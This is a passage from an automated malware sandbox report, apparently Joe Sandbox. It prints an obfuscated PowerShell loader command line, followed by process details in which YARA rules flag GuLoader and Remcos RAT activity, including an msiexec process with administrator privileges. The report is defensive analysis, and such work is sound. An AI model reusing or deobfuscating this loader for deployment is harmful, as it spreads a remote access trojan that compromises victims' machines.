th.SGhan=Ho.eNBagkEeuphwKirk- ClaOEkspbPinnJCen.e.dskCpredTHy,o SlacsFagmyGameSInert pheeCarnmBall.pidd$Indss djotGadgRSejlGTermh KnaAKrign AppD liglFagfEMegaN');Spuledes ($forevigende);Spuledes (Paining 'Lago$Esa,UNapod mof C ll.risa.ulkaveksdNonpdRente A,enFazieSul,sPrev. ,xeH Fo,eFritaLuded UdfeUdplrK.ntsVali[ L n$LegaUD.pin BerfDamea.ntiuAnt cstryequict Tare U,bdHvid] Per=Frdi$UncocFormrLittaP kevDawfemacan esuh ArbeFru aExtrrKun tF rueaglyd');$svaledes=Paining 'Sm.g$MiljUUvitdkapifMidtl .ala Misa TeedV lcdNonne ismnTe.eeantis Udh.Fo lDAnf osogew V gnAkkol P eo aasa,impdKontFOveriOverlKunaeMati(D,on$Ge mDdr,liInves stab N uudrisr UnbsBargahircbGteslUtaieA ch,Brig$ OveMSpaciStadlkondiRefoePla u Tvib R veforysAkkok Un yNonutTag.tjul eBrkdlFyr sNybaeSildsMeiok renostarnIndbvS,lfeSylln hrtTechi AnhoCorrnHandeUnn rOas sGrib)';$Milieubeskyttelseskonventioners=$Pavins;Spuledes (Paining ' Sp.$Po cgWienL rooFornbNyttatr mlAnlb:ParkLCampEPse dUnmagSkrae ycnR Kar=Jord(Loo TS,ibEB.giS skotNonm-NonsPAttraRecut FarHDbef Ste $s bsmkramiMeetlvigoI HexeSkr uFacibSpdlE.rtisT kskTidsYDel.T Me TBagsESkiplSognsU,brE BesS fl KTrumoGuttNMisdvUnexEmou N TrutCottIAmplODilaNR maEaf.pRthersLs e)');while (!$Ledger) {Spuledes (Paining 'util$unbagOpfolMipsoBemibCadeaCabilKuwa:C,biASexldA foe CenqTopauBil aBisecArbey fo,=Opsl$FrugBDesie TilhChieaFrotlDakfvD,nde Mals') ;Spuledes $svaledes;Spuledes (Paining 'Hypo[FldetSekuh vorRK rteNontArapiDGia,IUddaN apagChe . ubT inchEs irConce Egea rhvDLap.]Doze: Ind:G mpSSproLTimpETrigE S.np ath(Taft4Vejr0 aas0Trne0 und)');Spuledes (Paining ' Ta $P.ebgStrulGulvo diab Anta ollDeko:DeniLbetaESubtdRav.gVideESundRKran=O es(La,gT itzETop SSmaat Ove- oliPLe fAP efT Su HYrsn Bes$UngemHarmISlidlStirIsaboE UnduTr,aBHei eLic s rizK DipYWalet ClytRo,seSkolL ForSSkipeAllosMis KLaccO traNSkovVContETykkn ProTP.trIParrORoasNK.nfeGyror ,olsKran)') ;Spuledes (Paining ' mpl$RistGDe oLSarcOTriabKonsATricLOo i:Di,peNe,scDinghNonnuretocGedeaOlan=Over$Si.iGConylEnscOF lkBAnseaFljml Mis:EldrhBattAK nkrOv rr EnsiLnkoSUncoBsociuOmp R M,xgDeni+ to+Likv%Ento$MemoM Flyama.amCowfMAetho rskNKbspISk lSMal,MFolk. rrc StaO ppoUToten kriT') ;$Disbursable=$Mammonism[$Echuca]}$Pollster=334368;$Barytocelestite=30065;Spuledes (Paining 'funk$la rGM usLM ljoTraib moeAGgedlkons:MartlPetuy KlisStarK enO GulpFiskI D,msPige Mast=El,v G lg Po ESlagt Rom-se kc ,neoRussNSnertTi fEde iNNimbtTeab Rosb$SounMMaltIKlaslSe,rIBedrET opUEctoBGalgEMo uSAd.rkSubsYReg.tnessTTjave VelLProrSUneleL ngsSmokkMileosvinnMiljVUniveSt.rNmodttRegeI ourO ArbnFordEAdhir .onS');Spuledes (Paining 'Berr$SlidgTe nlOlieo,limbFarvaNonalSk d:KakoGDintoStrbrUdtrdDiseiSemioDammiSa,tdReci qui =Poly Tu.n[UnadS nsty kossKro.t aareFablmE,te.Par CLithoStninSalvvTileeN torBasitSkjo] app:Kemi:R siFBhlarWienoCa em UdvBFgtea blgs Omve,sce6Term4AbsoSsandtViserwhitiunshnbetog art(Aff $BortLBidsyUdbos OnekHelsoYp epTropi leksV.rv)');Spuledes (Paining 'pror$Sta.GHornlAtomO f sBS.niaKvruLU,gr:OutcTLngdeForetCh krCentAEye PCobsH TmmOE,tlS TripElash In,A RidtnoneEStra knyt=Deli Otio[Quans HexyAutosMototSammeVaa m mph. evTReasEScioXOr,ot exp.ForseFablNopdaCEft,OquadDUnw,i utoN ConGUnus]Past:miss:Hecta EulsSvincP ctIRas I.pst.RepaGC,moeBumpTKaprSYodltR spr Da iB,omn aneGAut ( igh$ToadGb,ocoTer,rUdmed TorI NumoafstI ,andBlge)');Spuledes (Paining ' Bes$ idrGTetrlTithOByrdbUdliATindL E c:P rtPServaHalvu.arbL jeriStirNSpejIFrafaWiddN Und5 bem2Tel.=baer$H antV.ltEPre,TUdperT,phaParoPSk lhshanosesqsOvnsPRenaH Br AtaxaT Gr,ERegi.CuncSForsUProjB PalSB kgTammoR SkiiSkyrN cupgMeta(Kl b$BetjpF.lkoTherLBaksL Bais SoltDobleAse RMa.s,Fru,$.ubwbCer AReslRAn,yYSaksTdksbOLi.pCUrtie.estLBilieKjersU ontHuskIOrthTWindEP ro)');Spuledes $Paulinian52;"
                                                                                                  Imagebase:0x740000
                                                                                                  File size:433'152 bytes
                                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 0000000E.00000002.1697743441.0000000008EE0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 0000000E.00000002.1680502700.0000000005F69000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000E.00000002.1697979779.000000000AC0F000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:15
                                                                                                  Start time:15:37:52
                                                                                                  Start date:10/03/2025
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff60c8c0000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:16
                                                                                                  Start time:15:38:23
                                                                                                  Start date:10/03/2025
                                                                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                                                  Imagebase:0x760000
                                                                                                  File size:59'904 bytes
                                                                                                  MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000010.00000002.1859072664.000000000064C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:20
                                                                                                  Start time:15:38:44
                                                                                                  Start date:10/03/2025
                                                                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Windows\System32\msiexec.exe"
                                                                                                  Imagebase:0x760000
                                                                                                  File size:59'904 bytes
                                                                                                  MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Reset < >